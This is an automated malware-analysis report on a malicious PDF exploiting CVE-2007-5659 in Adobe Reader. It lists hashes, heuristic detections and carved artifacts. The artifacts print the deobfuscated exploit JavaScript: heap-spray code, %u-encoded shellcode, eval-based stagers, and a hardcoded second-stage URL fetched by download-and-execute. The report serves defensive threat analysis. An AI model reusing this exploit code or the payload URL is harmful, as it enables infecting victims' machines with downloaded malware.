PDF malware analysis — malicious · 185a968c197a9c05

MALICIOUS

PDF

11.8 KB

MD5: 3923315bf777c99d576f3c5a341a5dff SHA-1: bb520f7f9099316a4d660a2850dc21b5ac0a9502 SHA-256: 185a968c197a9c05c2b5b49b1c05187490b8515443481b4543b8589e5b0c2669

338 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains embedded JavaScript that leverages the CVE-2007-5659 vulnerability (Collab.collectEmailInfo) to execute arbitrary code. The script is designed to download a second-stage payload from the URL http://qhjcwfbqthr.com/nte/gnh4.py/eU230d9c2eH7a95b51bV0100f060006R21c3aa88102T898ea140203l000cKcc9da8bd. This indicates a downloader or dropper functionality.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 11

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-36063 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-36063
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER

PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (matched in decompressed stream)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://qhjcwfbqthr.com/nte/gnh4.py/eU230d9c2eH7a95b51bV0100f060006R21c3aa88102T898ea140203l000cKcc9da8bd Referenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `eb39e2de4dbbc100de6d3e30aa43ff78fa075618862ba1ebba5151ea3a3b848d`	pdf-javascript-stream	PDF /JS object 7 at offset 0x19D	273 bytes
Preview script First 1,000 lines of the extracted script if (1) {var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));var th = event.target; s = th['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s);}
`generic_stage_recovery_000.js` `41323bb0bc5d6e8e4f59ad32a6e5f405b8b479252ecf9b61a0159542b2003e8e`	deobfuscated-js	generic stage recovery split-literal-normalize from JavaScript object 7 at offset 0x19D	263 bytes
Preview script First 1,000 lines of the extracted script if (1) {var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));var th = event.target; s = th['unescape'] (l) ;var e = app['eval']; e(s);}
`annotation_subject_callee_hex_stage_000.js` `eafcbbd61339902f3f848e0ead11bb79e9962ec93d4d3be26e71b6510a236817`	deobfuscated-js	annotation-subject callee-key decoded JavaScript at offset 0x14A	5011 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var y_0__2hc_3 = new Array();var yK_S57 = 0;var lY_u1r_c4i = "";function K34DdU_8YHe(S_rvEp, s6_yb1){var rx_qc55n____q = s6_yb1.toString();var x_H_EV = "";for(var YsH64wAa4j = 0; YsH64wAa4j < rx_qc55n____q.length; YsH64wAa4j++) {var wjVJY_Bt8_c = parseInt(rx_qc55n____q.substr(YsH64wAa4j, 1));if (!isNaN(wjVJY_Bt8_c)) {wjVJY_Bt8_c = wjVJY_Bt8_c.toString(16);if (wjVJY_Bt8_c.length == 1) { wjVJY_Bt8_c = "0" + wjVJY_Bt8_c; }else if (wjVJY_Bt8_c.length != 2) { wjVJY_Bt8_c = "00"; }x_H_EV = wjVJY_Bt8_c + x_H_EV;}}while(x_H_EV.length < 8) { x_H_EV = "0" + x_H_EV; }var g5_CoC8 = S_rvEp.toString(16);if (g5_CoC8.length == 1) { g5_CoC8 = "0" + g5_CoC8; }else if (g5_CoC8.length != 2) { g5_CoC8 = "00"; }x_H_EV = "3" + g5_CoC8 + "P" + x_H_EV;return x_H_EV;}function rkw_3Rx_Vcf(XRVL_x80lo, EXS4_Rd1Uy){var eSp__k_QI___a = new Array("");var tkm_O_s = XRVL_x80lo;var QbRST8y;if ((QbRST8y = XRVL_x80lo.lastIndexOf("%u00")) != -1) {if (QbRST8y + 6 == XRVL_x80lo.length) {eSp__k_QI___a[0] = XRVL_x80lo.substr(QbRST8y + 4, 2);tkm_O_s = XRVL_x80lo.substring(0, QbRST8y);}}QbRST8y = 1;for (YsH64wAa4j = 0; YsH64wAa4j < EXS4_Rd1Uy.length; YsH64wAa4j++) {var bB3LSAk8_7uiv_t = EXS4_Rd1Uy.charCodeAt(YsH64wAa4j).toString(16);if (bB3LSAk8_7uiv_t.length == 1) { bB3LSAk8_7uiv_t = "0" + bB3LSAk8_7uiv_t; }eSp__k_QI___a[QbRST8y] = bB3LSAk8_7uiv_t;QbRST8y++;}YsH64wAa4j = eSp__k_QI___a[0].length ? 0 : 1;eSp__k_QI___a[QbRST8y] = "00";eSp__k_QI___a[QbRST8y + 1] = "00";QbRST8y += 2;if ((eSp__k_QI___a.length - YsH64wAa4j) % 2) {eSp__k_QI___a[QbRST8y] = "00";}while(YsH64wAa4j < eSp__k_QI___a.length) {tkm_O_s += "%u" + eSp__k_QI___a[YsH64wAa4j + 1] + eSp__k_QI___a[YsH64wAa4j];YsH64wAa4j += 2;}tkm_O_s += "%u0000";return tkm_O_s;}function v7_5WYQ(w4_cfiDHArY, WO2_sm2){while (w4_cfiDHArY.length2<WO2_sm2) {w4_cfiDHArY += w4_cfiDHArY;}w4_cfiDHArY = w4_cfiDHArY.substring(0,WO2_sm2/2);return w4_cfiDHArY;}function PE__Y73mv(oExs__lT3, JY6N8iy__3ao, s68iM81_Ro){var E1md_1_r__2o = 0x0c0c0c0c;var w4_cfiDHArY = unescape(JY6N8iy__3ao);var EXS4_Rd1Uy = K34DdU_8YHe(oExs__lT3, s68iM81_Ro);var EP7sM3u___RIEf = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var XRVL_x80lo = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u15e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0093%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9d75%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%ue6e8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4770%u4e67%u0058%u7468%u7074%u2f3a%u712f%u6a68%u7763%u6266%u7471%u7268%u632e%u6d6f%u6e2f%u6574%u672f%u686e%u2e34%u7970%u652f%u3255%u3033%u3964%u3263%u4865%u6137%u3539%u3562%u6231%u3056%u3031%u6630%u3630%u3030%u3630%u3252%u6331%u6133%u3861%u3138%u3230%u3854%u3839%u6165%u3431%u3230%u3330%u306c%u3030%u4b63%u6363%u6439%u3861%u6462";app.Kl_____g = unescape(rkw_3Rx_Vcf(XRVL_x80lo, EXS4_Rd1Uy));var g_0EN3Cy_4qI_k = 0x400000;var Ici_D5REi__5_c = EP7sM3u___RIEf.length 2;var WO2_sm2 = g_0EN3Cy_4qI_k - (Ici_D5REi__5_c+0x38);w4_cfiDHArY = v7_5WYQ(w4_cfiDHArY, WO2_sm2);var EGF_B6 = (E1md_1_r__2o - 0x400000)/g_0EN3Cy_4qI_k;for (var O2_C_si = 0; O2_C_si < EGF_B6; O2_C_si++) {y_0__2hc_3[O2_C_si] = w4_cfiDHArY + EP7sM3u___RIEf;}}function lN_2rWB(){var sB_n1h = "";for (YsH64wAa4j = 0; YsH64wAa4j < 12; YsH64wAa4j++) { ... (truncated)
`legacy_pdfkit_stage_001.js` `1d6f25e75383d09c409108c933feea0cdc5ed7a97f9024be25857586e5463d75`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x2D6	11960 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function w_aJ3aQ5(Gp14ks5_SPq, WDO_1s37i4026){var R6t_k5 = arguments["c" + "azzee".replace(/zz/, 'll')];R6t_k5 = R6t_k5["t" + "oS" + "tr" + "ing"]();var miL__d = 0;try {if (app) {miL__d++;miL__d++;}} catch(e) { }var ccnJ_AY0oI = new Array();if (Gp14ks5_SPq) { ccnJ_AY0oI = Gp14ks5_SPq;} else {var r1TSM4N_L7d = 0;var lO_1PyhEdI = 0;var K16BLu = 512;var QgTxCL1_4Rqd = 52;QgTxCL1_4Rqd = QgTxCL1_4Rqd - 4;var IKNQa6_11Yi634 = QgTxCL1_4Rqd + 9;while(lO_1PyhEdI < R6t_k5.length) {var gfpPweY5aj = 1;var U_1R__ks = R6t_k5['c' + 'harCodeAt'](lO_1PyhEdI);if (U_1R__ks <= IKNQa6_11Yi634 && U_1R__ks >= QgTxCL1_4Rqd) {if (r1TSM4N_L7d == 4) { r1TSM4N_L7d = 0; }if (isNaN(ccnJ_AY0oI[r1TSM4N_L7d])) {ccnJ_AY0oI[r1TSM4N_L7d] = 0;}ccnJ_AY0oI[r1TSM4N_L7d] += U_1R__ks;if (ccnJ_AY0oI[r1TSM4N_L7d] > 512) {ccnJ_AY0oI[r1TSM4N_L7d] -= K16BLu;}r1TSM4N_L7d++;}lO_1PyhEdI++;}}r1TSM4N_L7d = 4;for (var X_8iLTTq_va = 0; X_8iLTTq_va < 4; X_8iLTTq_va++) {if (ccnJ_AY0oI[X_8iLTTq_va] > 256) {ccnJ_AY0oI[X_8iLTTq_va] -= 256;}}var E573k8_h_b = 0;var d____E1T_x3s_g = "";var mbro7__a_t = 0;var M___0__dQc = 0;var vO_3k6j4cN;var YEm7__06n_15c = 0;while(mbro7__a_t < WDO_1s37i4026.length) {var Mla__nY__TV = WDO_1s37i4026.substr(mbro7__a_t, 1) + "Z";var E7y5_Onh44_8 = parseInt(Mla__nY__TV, 16);if (M___0__dQc) {vO_3k6j4cN += E7y5_Onh44_8;if (E573k8_h_b == 4) {E573k8_h_b -= 4;}var Ij3e___CFs = vO_3k6j4cN;Ij3e___CFs = Ij3e___CFs - (YEm7__06n_15c + 2) * ccnJ_AY0oI[E573k8_h_b];if (Ij3e___CFs < 0) {Ij3e___CFs = Ij3e___CFs - Math.floor(Ij3e___CFs / 256) * 256;}Ij3e___CFs = String.fromCharCode(Ij3e___CFs);if (miL__d == 2) {d____E1T_x3s_g += Ij3e___CFs;} else if (miL__d == 1) {d____E1T_x3s_g += E7y5_Onh44_8;} else {d____E1T_x3s_g += mbro7__a_t;}E573k8_h_b++;M___0__dQc = 0;YEm7__06n_15c++;} else {M___0__dQc = 1;vO_3k6j4cN = E7y5_Onh44_8 * 16;}mbro7__a_t++;};var abcd=0; ;var j1A__WUR2K_D6 = this;j1A__WUR2K_D6['ev'+'al'](d____E1T_x3s_g);} w_aJ3aQ5(0, "4C0A36C2FB94B8E98DF3B4D539803097A64739B952A60A9C3F6A843BC5F3816C56822F4135CADFEACB419CEDB00EA2BA529253F7C33717CD72BA9C8F0AFF6275FCDE7285B65E37780ECCBF26DE71A5397EF25C271A78371C14F60CBE6AB096D96F2B558B1DCB49BC6E5324916BD0A54F14589361B1F618271E84F23123FFB1E8CA989716741E76F1D66A07E8BB3FB0D265A1B3870805554A80931778796FC87017FB843BD55D5EFE85E24DE6244DEDBA96F494DB858D6E9E35125D86D47DFC5A8861E39325AA7D78CD606B518BBB3C3F3480082AADC5B11D666750090B1E14E4A174CD829D4BC9BCEED89688C4464F5C9AB11365F242985ADF03AF37738B74E248212313E56ABDF88D20ABD14B7B83CFE84C48B45ABE0B721425D353EBB18A26563A0D0B1DFE0EEAB642D525880E7EC25DA34ACCEB24FADE76B0DF7B13FDBBB100BF4E7BA1373C424DE4AC2FBA84BA3090F27304665D370DCC250BE5BEAFC9E85DF15598CB9051B06E09239C50B7C979E86D6C61B5B3644F6C78303ACADABDDA8752641D222C72E0F89A2BB4CE05EFBD26967464E20738557EE846685456FF3C2AC1C3459D35A52F7A1451D22393D0C2DD23CACC6BA47ADEF6305F80D6C22EA18A51A443FF957A338E7C2C6984E31A33255B08FAD10878E73E534CC2ECF800F7EEA8ECC1672B8887EED89688C4464F5C9AB11365F2309862DDD99B1780587D374D112D0EE75D00E9762091C808B975C8ED4D3C626E85D053FE6C7C8AE9C57F3F8C29210204C5CAEAB941E411820C75F0215971F8F337D8D173B0BFC12D156077B6BC6394B83A383862F0DF660C76BE416ECA4AEB2D8E3ECAC618D1F18DACA3B2243589D009C9506A8B1ECC63238DEB3A0D2E9345C1C8300A3B31DE02CCBDABDABD5EA3E571F840C5CEBE31DECD32B0C36C797CA9E7445B99A1A90A7E6F6B076E1EA9851F824751EA89C153E719701FDD9ED9B1A23475688CF9F179CAC9A51F7F6C09C142E4A86A2A9921732779D03F1DFE39BFE294F57ACA495194F1121C25D0B1BB09D69747D66A46C07491BF432B978CEE2265466EE7589E03A7498950523235FF2708AA8DDAE07A20C4AA0AB97F86A61E2C9566C4EA8E0F46D53B05F3816C566E375241F41329DF6ACB11990E50D706A759F9B2062ADC9FCAA4740C067BB0F7DB2496AD6227594DF4AC2FBA65A23092F88CFA229147E514120EB29B9FB2CD4A019D9D0BBB087276320E844DC1A893C636545AA4DB44497649EC3E19CBEC1BC99D8D10661A80D91469EE97CFFDC07C2F827463EF05455B8791577B701DC84B18DBB7369A8E48F52ED70CEFF74D08ECBC05D3FA4A75A4D9EC3D61C0D1D128633664E97532D4A775CD52555179EC3135F676B4FF92FDAA006A9094CAFA294FA8E9BE06D59647909B30B37F86B266104546ADE022042EB35EE9FE9B21899020F7F60116F8CE9400C25E2DBBA04DC272CDFA4B3DB0998DC856FE42BE64DDD158735F44615F33F7FA1DE259E5D277CD61D54CA866A2BA1E2BB27485F3934B11 ... (truncated)
`deobfuscated.js` `e433036740d4f1f866cd32f7b98650abce4d211261e3a5ac42ae0f3b2ac2c54e`	deobfuscated-js	PDF JavaScript deobfuscation pass	70752 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script if (1) {var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));var th = event.target; s = th['unes' + 'cape'] (l) ;var e = app.eval; e(s);} z0dz0az0dz0az09z66z75z6ez63z74z69z6fz6ez20z77z5fz61z4az33z61z51z35z28z47z70z31z34z6bz73z35z5fz53z50z71z2cz20z57z44z4fz5fz31z73z33z37z69z34z30z32z36z29z7bz76z61z72z20z52z36z74z5fz6bz35z20z3dz20z61z72z67z75z6dz65z6ez74z73z5bz22z63z22z20z2bz20z22z61z7az7az65z65z22z2ez72z65z70z6cz61z63z65z28z2fz7az7az2fz2cz20z27z6cz6cz27z29z5dz3bz52z36z74z5fz6bz35z20z3dz20z52z36z74z5fz6bz35z5bz22z74z22z20z2bz20z22z6fz53z22z20z2bz20z22z74z72z22z20z2bz20z22z69z6ez67z22z5dz28z29z3bz76z61z72z20z6dz69z4cz5fz5fz64z20z3dz20z30z3bz74z72z79z20z7bz69z66z20z28z61z70z70z29z20z7bz6dz69z4cz5fz5fz64z2bz2bz3bz6dz69z4cz5fz5fz64z2bz2bz3bz7dz7dz20z63z61z74z63z68z28z65z29z20z7bz20z7dz76z61z72z20z63z63z6ez4az5fz41z59z30z6fz49z20z3dz20z6ez65z77z20z41z72z72z61z79z28z29z3bz69z66z20z28z47z70z31z34z6bz73z35z5fz53z50z71z29z20z7bz20z63z63z6ez4az5fz41z59z30z6fz49z20z3dz20z47z70z31z34z6bz73z35z5fz53z50z71z3bz7dz20z65z6cz73z65z20z7bz76z61z72z20z72z31z54z53z4dz34z4ez5fz4cz37z64z20z3dz20z30z3bz76z61z72z20z6cz4fz5fz31z50z79z68z45z64z49z20z3dz20z30z3bz76z61z72z20z4bz31z36z42z4cz75z20z3dz20z35z31z32z3bz76z61z72z20z51z67z54z78z43z4cz31z5fz34z52z71z64z20z3dz20z35z32z3bz51z67z54z78z43z4cz31z5fz34z52z71z64z20z3dz20z51z67z54z78z43z4cz31z5fz34z52z71z64z20z2dz20z34z3bz76z61z72z20z49z4bz4ez51z61z36z5fz31z31z59z69z36z33z34z20z3dz20z51z67z54z78z43z4cz31z5fz34z52z71z64z20z2bz20z39z3bz77z68z69z6cz65z28z6cz4fz5fz31z50z79z68z45z64z49z20z3cz20z52z36z74z5fz6bz35z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z67z66z70z50z77z65z59z35z61z6az20z3dz20z31z3bz76z61z72z20z55z5fz31z52z5fz5fz6bz73z20z3dz20z52z36z74z5fz6bz35z5bz27z63z27z20z2bz20z27z68z61z72z43z6fz64z65z41z74z27z5dz28z6cz4fz5fz31z50z79z68z45z64z49z29z3bz69z66z20z28z55z5fz31z52z5fz5fz6bz73z20z3cz3dz20z49z4bz4ez51z61z36z5fz31z31z59z69z36z33z34z20z26z26z20z55z5fz31z52z5fz5fz6bz73z20z3ez3dz20z51z67z54z78z43z4cz31z5fz34z52z71z64z29z20z7bz69z66z20z28z72z31z54z53z4dz34z4ez5fz4cz37z64z20z3dz3dz20z34z29z20z7bz20z72z31z54z53z4dz34z4ez5fz4cz37z64z20z3dz20z30z3bz20z7dz69z66z20z28z69z73z4ez61z4ez28z63z63z6ez4az5fz41z59z30z6fz49z5bz72z31z54z53z4dz34z4ez5fz4cz37z64z5dz29z29z20z7bz63z63z6ez4az5fz41z59z30z6fz49z5bz72z31z54z53z4dz34z4ez5fz4cz37z64z5dz20z3dz20z30z3bz7dz63z63z6ez4az5fz41z59z30z6fz49z5bz72z31z54z53z4dz34z4ez5fz4cz37z64z5dz20z2bz3dz20z55z5fz31z52z5fz5fz6bz73z3bz69z66z20z28z63z63z6ez4az5fz41z59z30z6fz49z5bz72z31z54z53z4dz34z4ez5fz4cz37z64z5dz20z3ez20z35z31z32z29z20z7bz63z63z6ez4az5fz41z59z30z6fz49z5bz72z31z54z53z4dz34z4ez5fz4cz37z64z5dz20z2dz3dz20z4bz31z36z42z4cz75z3bz7dz72z31z54z53z4dz34z4ez5fz4cz37z64z2bz2bz3bz7dz6cz4fz5fz31z50z79z68z45z64z49z2bz2bz3bz7dz7dz72z31z54z53z4dz34z4ez5fz4cz37z64z20z3dz20z34z3bz66z6fz72z20z28z76z61z72z20z58z5fz38z69z4cz54z54z71z5fz76z61z20z3dz20z30z3bz20z58z5fz38z69z4cz54z54z71z5fz76z61z20z3cz20z34z3bz20z58z5fz38z69z4cz54z54z71z5fz76z61z2bz2bz29z20z7bz69z66z20z28z63z63z6ez4az5fz41z59z30z6fz49z5bz58z5fz38z69z4cz54z54z71z5fz76z61z5dz20z3ez20z32z35z36z29z20z7bz63z63z6ez4az5fz41z59z30z6fz49z5bz58z5fz38z69z4cz54z54z71z5fz76z61z5dz20z2dz3dz20z32z35z36z3bz7dz7dz76z61z72z20z45z35z37z33z6bz38z5fz68z5fz62z20z3dz20z30z3bz76z61z72z20z64z5fz5fz5fz5fz45z31z54z5fz78z33z73z5fz67z20z3dz20z22z22z3bz76z61z72z20z6dz62z72z6fz37z5fz5fz61z5fz74z20z3dz20z30z3bz76z61z72z20z4dz5fz5fz5fz30z5fz5fz64z51z63z20z3dz20z30z3bz76z61z72z20z76z4fz5fz33z6bz36z6az34z63z4ez3bz76z61z72z20z59z45z6dz37z5fz5fz30z36z6ez5fz31z35z63z20z3dz20z30z3bz77z68z69z6cz65z28z6dz62z72z6fz37z5fz5fz61z5fz74z20z3cz20z57z44z4fz5fz31z73z33z37z69z34z30z32z36z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z4dz6cz61z5fz5fz6ez59z5fz5fz54z56z20z3dz20z57z44z4fz5fz31z73z33z37z69z34z30z32z36z2ez73z75z62z73z74z72z28z6dz62z72z6fz37z5fz5fz61z5fz74z2cz20z31z29z20z2bz20z22z5az22z3bz76z61z72z20z45z37z79z35z5fz4fz6ez68z34z34z5fz38z20z3dz20z70z61z72z73z65z49z6ez74z28z4dz6cz61z5fz5fz6ez59z5fz5fz54z56z2cz20z31z36z29z3bz69z66z20z28z4dz5fz5fz5fz3 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.